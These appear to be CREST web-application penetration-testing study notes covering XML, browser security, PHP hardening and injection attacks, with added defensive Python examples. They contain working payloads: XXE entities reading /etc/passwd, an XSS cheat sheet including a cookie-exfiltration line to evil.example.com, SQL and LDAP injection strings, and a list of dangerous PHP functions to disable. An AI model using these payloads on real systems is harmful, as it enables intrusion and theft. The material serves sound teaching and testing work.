XSD defines a schema, which is a definition of how an XML document can be structured. You can use it to check that a given XML document is valid and follows the rules you've laid out in the schema. One has to look at the XSD and create the XML accordingly, or else it won't communicate with another application or system that has been developed with a different technology. For example, a company in Chicago provides an XSD template for a company in Texas to write or generate their XML in the given XSD format. If the company in Texas fails to adhere to the rules or schema given in the XSD, then it is impossible to expect correct information from the company in Chicago.

WSDL is an XML document that describes a web service. It shows which operations are available and how data should be structured to send to those operations. A WSDL may or may not have an XSD to validate its structure; WSDL documents have an associated XSD that shows what is valid to put in a WSDL document.

Example: an XSD defines the elements for an XML document, and the XML uses it. [figures not reproduced]

The WSDL below describes a web service called Book: [figure not reproduced]
Browser Security
SOP - the same-origin policy is a security enforcement found in most common browsers that restricts the way a document or script (or other data) loaded from one origin can communicate with and access properties of another origin. It's a crucial security concept underpinning web applications of various kinds. An origin is considered the same when the protocol, hostname and port number of the web page are the same. Keep in mind that the same-origin policy is not only for JS but also for cookies, AJAX, Flash (but not images?), and so on. Data stored inside localStorage is also governed by this policy, that is, origin-separated.

G5 - Web Mark-up Languages
Web mark-up languages: HTML, XML

An XML DTD is a document which is used to validate an XML document against certain criteria; remember that an XML document may be syntactically correct but still not follow the DTD. It acts as a validating template containing the defined, valid structure, attributes and elements for a certain XML document.

An XXE attack is based on the concept of external entities in XML. The URI portion of an external entity can be abused to do nasty things such as reading files, exfiltrating data, server-side request forgery, or even executing arbitrary code.

<!DOCTYPE student [ <!ENTITY oops SYSTEM "file:///etc/passwd"> ]>

SSRF:
<!DOCTYPE student [ <!ENTITY oops SYSTEM "http://scanme.nmap.org:20/"> ]>

G6 - Web Programming Languages
Common web programming languages: JSP, ASP, PHP, CGI-based Perl and JavaScript.

JSP (Java Server Pages) and ASP (Active Server Pages) are two of the commonly used server-side scripting languages in web development today. ... ASP code is interpreted on the fly each time it is accessed, while JSP pages can either be interpreted or compiled into a servlet.

PHP
- A common practice in PHP is to escape parameters using the function mysql_real_escape_string() before sending the SQL query.
- eval() - evaluate a string as PHP code. This is often used by an attacker to hide their code and tools on the server itself. You can configure PHP to disable eval(). The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use is thus discouraged.
- To restrict PHP information leakage, disable expose_php: expose_php = Off
- File uploads - you can disable file uploads in PHP: file_uploads = Off
- Turn off remote code execution - if enabled, allow_url_fopen allows PHP's file functions (such as file_get_contents() and the include and require statements) to retrieve data from remote locations, like an FTP or web site: allow_url_fopen = Off
- Enable SQL safe mode: sql.safe_mode = On
- Disable dangerous PHP functions: disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source (note that __call is not among them)
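Returning to the XXE and SSRF payloads shown under G5: as an added example (mine, not from these notes), the Python function below parses XML from an untrusted source with the standard-library expat parser and aborts as soon as a DOCTYPE, an entity declaration or an external entity reference appears, so neither file:///etc/passwd nor the http:// URI is ever resolved. The function names and sample documents are my own; the samples are modelled on the two payloads above.

```python
"""Hardened XML parsing that refuses DOCTYPE/entity constructs (added example, not from the CREST notes)."""
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when a document carries the constructs an XXE or SSRF payload relies on."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted source and return {element name: text} for text-bearing elements.

    Any DOCTYPE, entity declaration or external entity reference aborts parsing, so a document
    such as <!DOCTYPE student [<!ENTITY oops SYSTEM "file:///etc/passwd">]> is rejected before
    the parser ever tries to resolve the file:// or http:// URI.
    """
    parser = expat.ParserCreate()
    # Never fetch external parameter entities: loading the DTD itself can be an SSRF vector.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject(*_handler_args):
        raise UnsafeXML("DOCTYPE / entity declarations are not accepted from untrusted input")

    parser.StartDoctypeDeclHandler = reject      # fires on any <!DOCTYPE ...>, internal or external
    parser.EntityDeclHandler = reject            # fires on <!ENTITY ...> inside an internal subset
    parser.ExternalEntityRefHandler = reject     # fires if an external entity is referenced anyway

    result, text_buf = {}, []

    def start(_name, _attrs):
        text_buf.clear()

    def chars(text):
        text_buf.append(text)

    def end(name):
        text = "".join(text_buf).strip()
        if text:
            result[name] = text
        text_buf.clear()

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from exc
    return result


def is_safe_xml(data: bytes) -> bool:
    """Convenience wrapper: True if the document parses without hitting a rejected construct."""
    try:
        parse_untrusted_xml(data)
        return True
    except UnsafeXML:
        return False


# Constructed sample inputs (not from the notes): one benign document and two modelled on the payloads above.
BENIGN = b"<student><name>alice</name><year>2</year></student>"
XXE_FILE = (b'<!DOCTYPE student [ <!ENTITY oops SYSTEM "file:///etc/passwd"> ]>'
            b"<student><name>&oops;</name></student>")
XXE_SSRF = (b'<!DOCTYPE student [ <!ENTITY oops SYSTEM "http://scanme.nmap.org:20/"> ]>'
            b"<student><name>&oops;</name></student>")

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN))        # {'name': 'alice', 'year': '2'}
    for sample in (XXE_FILE, XXE_SSRF):
        print("rejected" if not is_safe_xml(sample) else "accepted")
```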
PHP Safe Mode
PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISPs, use safe mode for now. This feature has been DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0. Some of the major limitations of safe mode include the following:
- PHP file uploads: on the DV server, the web server runs as the Apache user, so all files uploaded via PHP are owned by Apache. This may cause ownership problems for many users.
- File modifications: moving, copying, and changing ownership and permissions of files can only be done when they are owned by the administrative user.
- System commands: PHP scripts cannot use the exec() and system() functions, which means that shell commands cannot be run from within a PHP script.
- Most script kiddies try to exploit PHP applications such as WordPress using the exec(), passthru(), shell_exec(), system(), popen() and proc_open() functions.
  - exec - execute an external program
  - shell_exec - execute a command via the shell and return the complete output as a string
  - system - execute an external program and display the output
  - __call - PHP magic function; the __ prefix reserves the function name as magical. Not used for system commands.

If the safe_mode directive is enabled, PHP places restrictions on the use of some dangerous functions. Some functions are disabled, and others are subject to limitations on their use. For example:
- The shell_exec function is disabled because it can be used to execute operating system commands.
- The mail function has the parameter additional_parameters disabled, because unsafe use of this parameter may lead to SMTP injection flaws.
- The exec function can be used only to launch executables within the configured safe_mode_exec_dir. Metacharacters within the command string are automatically escaped.

If the magic_quotes_gpc directive is enabled, any single quote, double quote, backslash and NULL characters contained within request parameters are automatically escaped using a backslash.
- allow_url_fopen - if disabled, this directive prevents some file functions from accessing remote files.
- allow_url_include - if disabled, this directive prevents the PHP file include functions from being used to include a remote file.
- display_errors - if disabled, this directive prevents PHP errors from being reported to the user's browser.
- file_uploads - if enabled, this directive causes PHP to allow file uploads over HTTP.
- upload_tmp_dir - temporary directory used to store uploaded files. Ensure sensitive files are not stored in a world-readable location.

G7 - Web Application Servers
Vulnerabilities in common application frameworks, servers and technologies: .NET, J2EE, ColdFusion, Ruby on Rails and AJAX.

G8 - Web APIs
Application interfaces: CGI (like my old contact-us Perl script), ISAPI filters (like iirf.ini) and Apache modules (like mod_mysql).

G9 - Web Sub-Components
Web architecture sub-components: thin/thick web clients, servlets and applets, ActiveX.

A thin web application can be considered as having centrally operated or managed applications: for example, a web application running through a central operational server, whose users don't have to hold all the necessary software or hardware packages, because all the processes are operated centrally and not from the user's side. A thick application, by contrast, is for example a device or platform running Microsoft's heavy applications on specific hardware. All operations and processing are done locally, as thick applications don't depend on any centrally managed server or unit.

Flash
Flash objects run in the Flash virtual machine and, like Java applets, are sandboxed from the host computer. Flash Player security follows a sandbox security model. This means that files and other data gathered by the Flash Player are sorted into isolated security sets called sandboxes.
https://twitter.com/testalways/status/990623934599938048?s=09

To decompile and disassemble Flash, you can use the following tools:
- Flasm - www.nowrap.de/flasm
- Flare - www.nowrap.de/flare
- SWFScan - www.hp.com/go/swfscan (this works for ActionScript 2 and 3)

.Net Thick Clients

Java Applets
Buffer overflow in Java applets?

Java - Sandbox Model
- Automatic garbage collection.
- Secure class loading and a verification mechanism ensure that only legitimate Java code is executed. A Java Code Signing Certificate allows you to sign all kinds of Java applications and applets. When you sign your Java code using a Java Code Signing Certificate, your users will know that it com

es from a trusted source (you) and that it hasn't been tampered with since you signed it.
- The sandbox provides a very restricted environment in which to run untrusted code obtained from the open network.
- The essence of the sandbox model is that local code is trusted to have full access to vital system resources (such as the file system), while downloaded remote code (an applet) is not trusted and can access only the limited resources provided inside the sandbox.
- One of the most significant advantages of languages such as C# and Java is that programmers do not need to worry about the kind of buffer management and pointer arithmetic problems that have affected software developed in native languages such as C and C++.

Stack and Heap
There are two main types of data structures in a process that are used for memory management: the stack and the heap. The stack is a LIFO (last in, first out) structure (like a pile of plates) that is used mainly for storage of local variables and data related to function calls.

Buffer overflow vulnerabilities occur when an application copies user-controllable data into a memory buffer that is not sufficiently large to accommodate it. The destination buffer is overflowed, resulting in adjacent memory being overwritten with the user's data.

Stack overflows: buffer overflows typically arise when an application uses an unbounded copy operation (such as strcpy in C) to copy a variable-size buffer into a fixed-size buffer without verifying that the fixed-size buffer is large enough.

Heap overflows: the same kind of unsafe operation as described above, except that the overflowed destination buffer is allocated on the heap, not the stack. Memory on the heap is dynamically allocated by the application at run-time and typically contains program data.
  • 59. AJAX
The name was originally an acronym for "Asynchronous JavaScript and XML", although in today's web Ajax requests need not be asynchronous and need not use XML. With Ajax, some user actions are handled in client-side script and do not cause a full reload of the page. Instead, the script performs a request "in the background" and typically receives a much smaller response that is used to update only part of the user interface. The core technology is XMLHttpRequest (the Fetch API in newer code). From a testing point of view these background endpoints are part of the attack surface and must be enumerated and tested like any other request.

De-compilation of client-side code
Java: JAD
  • 60. Appendix H: Web Testing Methodologies

H1 - Web Application Reconnaissance
Benefits of performing application reconnaissance. Discovering the structure of web applications. Methods to identify the use of application components defined in G1 to G9.

H2 - Threat Modelling and Attack Vectors
Simple threat modelling based on the customer's perception of risk. Relate functionality offered by the application to potential attack vectors.

H3 - Information Gathering from Web Mark-up
Examples of the type of information available in web page source that may prove useful to an attacker:
 Hidden form fields
 Database connection strings
 Credentials
 Developer comments
 Other included files
 Authenticated-only URLs

H4 - Authentication Mechanisms
Common pitfalls associated with the design and implementation of application authentication mechanisms:
 Brute force (no lockout or rate limiting)
 Password complexity
 Password recovery mechanism
 Store passwords in a secure fashion (salted, slow hash)
 Transmit passwords only over TLS or another strong transport
 Authentication error messages (do not reveal whether the username or the password was wrong)

H5 - Authorisation Mechanisms
Common pitfalls associated with the design and implementation of application authorisation mechanisms:
 User roles must be enforced on all endpoints, server-side, on every request (not only in the UI).

H6 - Input Validation
The importance of input validation as part of a defensive coding strategy. How input validation can be implemented and the differences between whitelisting, blacklisting and data sanitisation.
A blacklist tests the input against a list of known-bad values: you compile a list of all the bad conditions and verify that the input received is not one of them.
  • 61. A whitelist tests the input against a list of known-good values: you compile a list of all the acceptable values or conditions and verify that the input received is one of them. Whitelisting is the stronger approach, because a blacklist only stops the bad inputs you thought of.
For example, consider automatically rejecting incoming phone calls. You could have a blacklist of marketing companies, so everyone but them would be able to call you. Or you could have a whitelist containing your friends' numbers, so only they would be able to call you.

H7 - Application Fuzzing
Fuzzing and its relevance within web application penetration testing. The use of fuzz strings and their potential effects. Potential dangers of fuzzing web applications (denial of service, corrupted data, unintended transactions).

H8 - Information Disclosure in Error Messages
How error messages may indicate or disclose useful information (stack traces, SQL errors, file paths, version strings).

H9 - Use of Cross Site Scripting Attacks (XSS)
Potential implications of a cross site scripting vulnerability. Ways in which the technique can be used to benefit an attacker.
The double forward slash // starts a comment in JavaScript.

JavaScript - alert box
<script>alert("I am an alert box!");</script>
Note the closing bracket is followed by a ; (optional, but conventional). The string can use single or double quotes, but alert<"XSS"> (angle brackets instead of parentheses) or an unbalanced quote inside ( ) is a syntax error and nothing runs.
Extra angle brackets around the tag are tolerated, because the HTML parser emits a stray < as text: <<<script>alert("I am an alert box!");</script>>>>>>>>>>>>>>>>> still executes.
As in SQL, quotes delimit strings (never quote integers). JavaScript treats single and double quotes identically for string literals; the choice only matters for which character you need in order to break out of the surrounding attribute or string in the page.

document.cookie
The following, when saved as a bookmark, displays the literal text document.cookie in an alert box:
javascript:alert('document.cookie');
Remove the quotes (single or double) and it returns the cookies for the loaded site in the alert box, because the text stops being a string and becomes code:
  • 62. document.cookie returns the cookies of the site the script runs in, so a payload delivered through stored XSS reads the victim's cookies (cookies flagged HttpOnly are not exposed to script).
document.write(document.cookie); - prints the cookie into the page (as opposed to a pop-up alert)
<script>document.cookie = "username=Logged into Internet Bank";</script> - you can also create a cookie by assigning to document.cookie.

Payload notes (straight quotes are what the browser needs; curly quotes from copy-paste will not work):
<<script>alert<"XSS">;//<</script>            # invalid JS (alert<"XSS"> is not a call), will not run
</TITLE><SCRIPT>alert("XSS");</SCRIPT>         # breaks out of a <title> element first
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>   # loads a remote script; / works in place of a space
";alert('XSS');//                              # no <script> tag: only runs when reflected inside an existing script string
<BODY ONLOAD=alert('XSS')>                     # no <script> tag needed: event handler attributes execute
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>   # javascript: URL as a frame source
window.location='http://evil.example.com/?cookie='+document.cookie   # exfiltrates cookies to an attacker host
<a href="javascript:alert('myxssruns')">Click Me</a>
javascript:alert(1)
<a href="javascript:alert(1)">Skip</a>         # injected into an href
javascript://%0d%0aalert(1);                   # // comments the rest out, the decoded CRLF ends the comment so alert runs; useful when a validator insists on "//"
javascript://%0d%0aalert(1);//http://derp.com   # same, with a trailing host to satisfy URL checks
javascript://%0d%0aalert(1);//.com
search/"><img src=x onerror=alert(1)>          # breaks out of an attribute value, then the error handler fires
<script>alert(12345)</script>

H10 - Use of Injection Attacks
Potential implications of injection vulnerabilities.

SQL injection - use of '
 Integer values are not quoted in SQL (quoting them turns them into strings), so in an integer context the payload needs no quote: id=1 OR 1=1.
 Strings such as username, password or resource name sit inside ' ', so the payload starts with ' to close the string the developer opened.
 The developer's query also closes the string (and may end with ;). Either balance it, so the trailing quote is consumed by your payload (' OR '1'='1 becomes '' OR '1'='1' once the original quote is appended), or comment the rest of the query out (' OR 1=1-- ), in which case anything the server appends after the comment marker is ignored. The trailing ; belongs to the server-side code; you do not add it from the client.
 The worked example that follows is for blind injection, where the injected field may be string data and you see no error to guide you.
For example, in the password box enter ' AND (SELECT id FROM users LIMIT 1)=' which leads to the query:
SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM users LIMIT 1) = '';
Examples from the book. Note that all start with ' or " OR, integers are not quoted, and each line ends with either a comment or a fragment that re-balances the quotes:
  • 63. ' OR 1=1--
" OR 1=1--
OR 1=1--
' OR 'a'='a
" OR "a"="a
') OR ('a'='a

Blind (time-based) SQL injection
Microsoft SQL: ?id=1' WAITFOR DELAY '00:00:10'-- ; WAITFOR TIME 'hh:mm:ss' also works (rarely used, but it can bypass weak blacklist filters that only check for the popular WAITFOR DELAY).
MySQL: BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')) executes the ENCODE function 5,000,000 times; SLEEP(10) is simpler. A time-consuming expression delays the response only if the condition it is attached to is true.
PostgreSQL: pg_sleep(10)
Oracle: DBMS_LOCK.SLEEP can be used, but it has to be wrapped in a PL/SQL block: BEGIN DBMS_LOCK.SLEEP(15); END;

LDAP injection
Query types: simple match conditions; disjunctive (several search conditions ORed together, e.g. from several sources); conjunctive (conditions ANDed together, like username and password).
LDAP names entries by DN (distinguished name). A DN might look like this: cn=Richard Feynman, ou=Physics Department, dc=Caltech, dc=edu
Certain characters are special within a DN and must be escaped with a backslash if they appear in an individual component. Active Directory requires these ten to be escaped: , \ # + < > ; " = and a leading or trailing space (? is not special in a DN).
Characters that are allowed in distinguished names and do not need to be escaped include: * ( ) . & - _ [ ] ` ~ | @ $ % ^ ? : { } ! ' (and # except at the start of a value).
Note that DN escaping is not search-filter escaping: inside a filter value the metacharacters ( ) * \ and the NUL byte are what matter, and RFC 4515 requires them to be escaped as \28 \29 \2a \5c \00.
LDAP injection is a server-side attack that can allow sensitive information about users and hosts represented in an LDAP structure to be disclosed, modified or inserted. This is done by manipulating the input parameters that are afterwards
  • 64. passed to the internal search, add and modify functions. A web application could use LDAP to let users authenticate or to search other users' information inside a corporate directory.
Boolean conditions and group aggregations in an LDAP search filter are expressed with the following metacharacters: & (AND) | (OR) ! (NOT) = ~= >= <= * ( )
Suppose a web application uses a search filter like the following:
searchfilter="(cn="+user+")"
which is instantiated by an HTTP request like this:
http://www.example.com/ldapsearch?user=John
If the value 'John' is replaced with '*', by sending the request:
http://www.example.com/ldapsearch?user=*
the filter becomes:
searchfilter="(cn=*)"
which matches every object with a 'cn' attribute of any value. If the application is vulnerable to LDAP injection, it will display some or all of the users' attributes, depending on the application's execution flow and the permissions of the LDAP user the application binds as.
A tester can use a trial-and-error approach, inserting ( | & * and the other metacharacters into the parameter to check the application for errors.
Using the following values in a login form:
user=*)(uid=*))(|(uid=*
pass=password
the search filter becomes:
searchlogin="(&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))";
The first complete filter, (&(uid=*)(uid=*)), is well-formed and always true, and many servers ignore the trailing remainder. This way the tester is logged in as the first user in the LDAP tree.
Characters that may be used to interfere with the LDAP query should be escaped or blocked, including: ( ) | & * ; , = and the null byte (%00).
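The two injections above (the SQL ' OR '1'='1 family and the LDAP filter breakout) are the same mistake, a user value concatenated into query text, so one added example covers both. This is code written for this page, not taken from the book or from OWASP: the users table, its two rows and the (&(uid=...)(userPassword=...)) template are constructed here, and sqlite3 stands in for a real database. It shows the page's own payloads producing the page's own resulting queries, beside the parameterised and RFC 4515-escaped forms that defeat them.

```python
"""String-concatenated queries and why the ' and ( ) metacharacters matter.

Added example for this page (not code from any product it discusses). The
users table, its two rows and the LDAP filter template are constructed here;
sqlite3 stands in for the real database.
"""
import base64
import hashlib
import sqlite3


def make_db():
    """Constructed sample database: two users, plaintext passwords for brevity."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "s3cret"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, username, password):
    """Builds the query as the page shows it: both values land inside '...' in the SQL
    text, so a leading ' in the input closes the developer's string and the rest is SQL."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in db.execute(sql)]


def lookup_by_id_vulnerable(db, user_id):
    """Integer context: the template has no quotes, so the payload must not have them either."""
    return [row[0] for row in db.execute(f"SELECT username FROM users WHERE id = {user_id}")]


def login_safe(db, username, password):
    """Parameterised: values travel separately from the SQL text, so quotes are just data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]


# RFC 4515 escapes for a value placed inside an LDAP search filter.
LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value):
    return "".join(LDAP_ESCAPES.get(ch, ch) for ch in value)


def md5_userpassword(password):
    """The {MD5} userPassword form used in the page's example: base64(md5(password))."""
    digest = hashlib.md5(password.encode()).digest()
    return "{MD5}" + base64.b64encode(digest).decode()


def login_filter(user, password, escape=False):
    """(&(uid=USER)(userPassword=HASH)) built from the two login form fields."""
    if escape:
        user = escape_filter_value(user)
    return f"(&(uid={user})(userPassword={md5_userpassword(password)}))"


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin", "' OR '1'='1"))   # ['admin', 'bob']
    print(login_safe(db, "admin", "' OR '1'='1"))         # []
    print(login_filter("*)(uid=*))(|(uid=*", "password"))
    print(login_filter("*)(uid=*))(|(uid=*", "password", escape=True))
```

With the page's payloads, login_vulnerable returns every user because AND binds tighter than OR, so the WHERE clause becomes (username='admin' AND password='') OR '1'='1'; the -- variant works in the same way by discarding the developer's trailing quote. login_filter reproduces the page's searchlogin string character for character, and with escape=True the * ) ( become \2a \29 \28 and the filter stays a single, literal uid match.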
  • 65. Code injection

XML injection - XXE
An XML External Entity attack occurs when an application parses XML input and a reference to an external entity is processed by a weakly configured XML parser. The entity does not have to point at an XML document: it can reference any file the server can read (e.g. file:///etc/passwd) or a URL (the exam asked this).

CRLF injection
CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). Windows uses both CR and LF to end a line, whereas Linux/UNIX uses LF alone. In the HTTP protocol the CRLF sequence always terminates a line, which is why CRLF injection into a header is also known as HTTP response splitting. Often used for cache poisoning or XSS.
Some web apps use user input to generate headers in their response, such as a selected language. If the application does not filter the input, the user can send language=english%0d%0a... at which point a new header line is created, or an XSS payload can be placed in the response body. Location and Set-Cookie are the headers most likely to carry user input.
In a CRLF injection attack the attacker inserts both carriage return and line feed characters into user input to trick the server, web application or user into thinking that one object has ended and another has started.
/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
%0d and %0a are the URL-encoded forms of CR and LF. After the attacker inserts those characters and the application writes the request path to its log, the entries look like this:
IP - Time - Visited Path
123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
By exploiting a CRLF injection vulnerability the attacker can fake log entries to obscure his own malicious actions.
HTTP request smuggling is a related but distinct attack: the front end (WAF, proxy or load balancer) and the back end disagree about where one request ends and the next begins (for example conflicting Content-Length and Transfer-Encoding headers), so a request the front end never inspected reaches the application. The weakness is in the intermediary's parsing rather than in the application itself.
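Both CRLF cases on this slide, the split redirect header and the forged log line, as an added example written for this page (not from any of the sources it quotes). The redirect handler, the log format and the attacker values are constructed; the injected path is the one shown above. The vulnerable builders copy the decoded value straight in, and the safe ones either percent-encode it or neutralise control characters so one request stays one header line and one log line.

```python
"""CRLF injection: header splitting in a redirect and log forging.

Added example for this page; the redirect handler, log format and the
attacker-supplied values are constructed here.
"""
import re
from urllib.parse import quote, unquote

CRLF = "\r\n"


def header_value_is_safe(value):
    """A header value must not contain CR, LF or NUL; rejecting is the strictest option."""
    return re.search(r"[\r\n\x00]", value) is None


def redirect_vulnerable(lang):
    """Copies the decoded user value straight into the Location header."""
    return f"HTTP/1.1 302 Found{CRLF}Location: /home?lang={lang}{CRLF}{CRLF}"


def redirect_safe(lang):
    """Percent-encodes the value, so CR/LF arrive as %0D%0A and cannot end the header."""
    return f"HTTP/1.1 302 Found{CRLF}Location: /home?lang={quote(lang, safe='')}{CRLF}{CRLF}"


def parse_headers(raw):
    """Splits a raw response into {name: value}, the way a browser or cache would."""
    head = raw.split(CRLF + CRLF, 1)[0]
    headers = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def log_entry_vulnerable(ip, when, path):
    return f"{ip} - {when} - {path}\n"


def log_entry_safe(ip, when, path):
    """Escapes CR, LF and other control characters so one request is one line."""
    clean = re.sub(r"[\x00-\x1f\x7f]", lambda m: "\\x%02x" % ord(m.group()), path)
    return f"{ip} - {when} - {clean}\n"


def entries_in(log_text):
    """What a log reviewer (or a SIEM) sees: one entry per line."""
    return [line for line in log_text.splitlines() if line]


# Constructed attacker input, as it arrives after the server URL-decodes it.
INJECTED_LANG = unquote("english%0d%0aSet-Cookie:%20session=attacker")
INJECTED_PATH = unquote("/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - "
                        "/index.php?page=home&restrictedaction=edit")
```

parse_headers on the vulnerable redirect shows a Set-Cookie header the application never meant to send; on the safe one the whole payload stays inside the Location value. The vulnerable log line splits into the two entries shown on the slide, the safe one stays a single entry with a visible \x0d\x0a in it.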
  • 66. H11 - Session Handling
Common pitfalls associated with the design and implementation of session handling mechanisms.
 Cookies: exposure via XSS (set HttpOnly); transport: restrict the session cookie to a secure channel (Secure flag).
 HTTP itself is a stateless protocol; session management enables the application to identify a given user uniquely across a number of different requests and to handle the data it accumulates about the state of that user's interaction with the application.
 Session tokens should only be stored in non-persistent (session) cookies.
 Generation of session cookie values: are they predictable? Issue a fresh token after login so a fixated token cannot be reused.

H12 - Encryption
Common techniques used for encrypting data in transit and data at rest, either on the client or server side.
PGP: to encrypt data, PGP generates a symmetric key that encrypts the data, and that symmetric key is protected by the asymmetric key. PGP can be used to send messages confidentially by combining symmetric-key and public-key encryption. The message is encrypted with a symmetric algorithm, which requires a symmetric key; each symmetric key is used only once and is called a session key. The message and its session key are sent to the receiver. The session key must be sent so the receiver can decrypt the message, but to protect it in transit it is encrypted with the receiver's public key. Only the receiver's private key can decrypt the session key.
RC algorithms: the RC algorithms are a set of symmetric-key encryption algorithms invented by Ron Rivest. Despite the similarity in their names, the algorithms are for the most part unrelated. There have been six RC algorithms so far.
Common symmetric encryption algorithms: AES (Advanced Encryption Standard), Blowfish, DES (Data Encryption Standard), Triple DES, Serpent, Twofish, RC4/RC5/RC6.
Common asymmetric algorithms: RSA, ECC (elliptic curve), DSA (signatures only).
MD5 - salted: hash(salt + password). When a user picks or is assigned a password, it is hashed together with a randomly generated value called the salt, and the salt is stored alongside the hash. (The "4096 different ways" figure often quoted refers to the 12-bit salt of the traditional DES-based crypt; md5crypt uses up to 8 salt characters, far more.) When a user logs in and supplies a password, the salt is first retrieved from the stored entry, the supplied password is hashed with it and the result compared.
Salting protects against:
 rainbow tables (pre-calculated hashes)
 dictionary attacks (often included in the above; each candidate must be hashed once per salt)
 finding identical passwords once you crack one (without a salt, everyone whose password is "password" has the same hash)
Contents of /etc/shadow:
[root@slashroot1 ~]# cat /etc/shadow
root:$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1:15651:0:99999:7:::
The first $-delimited field is a number that tells you the hashing algorithm in use:
$1 = MD5 (md5crypt)
$2 = Blowfish (bcrypt)
$2a = eksblowfish (bcrypt)
$5 = SHA-256
$6 = SHA-512
The second field is the salt value; the last field is the hash of salt + user password (iterated many times, not a single hash call).
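To see exactly what "hash of salt + password" means for a $1$ entry, here is an added example written for this page: a pure-Python port of the md5crypt algorithm (the $1$ scheme that openssl passwd -1 implements), plus a parser for the shadow line above and a verify function that does what login does. It is not code from the slashroot write-up or from OpenSSL; the shadow line is the one quoted above and the second test entry is constructed. The loop structure is the algorithm's own: an alternate sum mixed in per password byte, a bit-by-bit length walk, and 1000 dependent MD5 rounds, which is why this is slow on purpose.

```python
"""Parse an /etc/shadow entry and recompute its $1$ (md5crypt) hash from the stored salt.

Added example for this page: a pure-Python port of md5crypt, the algorithm behind
openssl passwd -1, written here rather than taken from any project.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# The entry quoted on this page.
SHADOW_LINE = "root:$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1:15651:0:99999:7:::"


def parse_shadow(line):
    """user:$id$salt$hash:... -> the user, algorithm id, salt and hash."""
    user, field = line.split(":")[:2]
    _, alg_id, salt, digest = field.split("$")
    return {"user": user, "id": alg_id, "salt": salt, "hash": digest}


def _to64(value, count):
    """crypt(3)'s base-64 variant: least significant 6 bits first, ITOA64 alphabet."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    pw = password.encode()
    salt = salt.encode()[:8]          # md5crypt uses at most 8 salt characters
    magic = b"$1$"
    ctx = hashlib.md5(pw + magic + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    remaining = len(pw)
    while remaining > 0:              # mix in as many alternate-sum bytes as the password is long
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:                        # for each bit of the length: a NUL or the first password byte
        ctx.update(b"\0" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):             # the slow part: 1000 dependent rounds
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    encoded = ""                      # 16 digest bytes, permuted, as 22 base-64 characters
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return (magic + salt).decode() + "$" + encoded


def verify_shadow(line, password):
    """True when the candidate password reproduces the stored $1$ entry, as login does."""
    entry = parse_shadow(line)
    if entry["id"] != "1":
        raise ValueError("only $1$ (md5crypt) entries are handled here")
    return md5crypt(password, entry["salt"]) == "$1$" + entry["salt"] + "$" + entry["hash"]
```

verify_shadow is the whole of what a login check has to do: take the salt out of the stored entry, recompute, compare. The same password with a different salt gives a completely different 22-character hash, which is the property that defeats rainbow tables.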
  • 67. The salt value is Etg2ExUZ. You can reproduce the same output by providing the salt value Etg2ExUZ and the original password:
[root@slashroot1 ~]# openssl passwd -1 -salt Etg2ExUZ redhat
$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1
[root@slashroot1 ~]#
The stored entry can only be reproduced with exactly the same salt value (which is randomly selected by the password program).

Identification and exploitation of encoded values (e.g. Base64) and identification and exploitation of cryptographic values (e.g. MD5 hashes)

Base64
 Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation. The term Base64 originates from a specific MIME content transfer encoding.
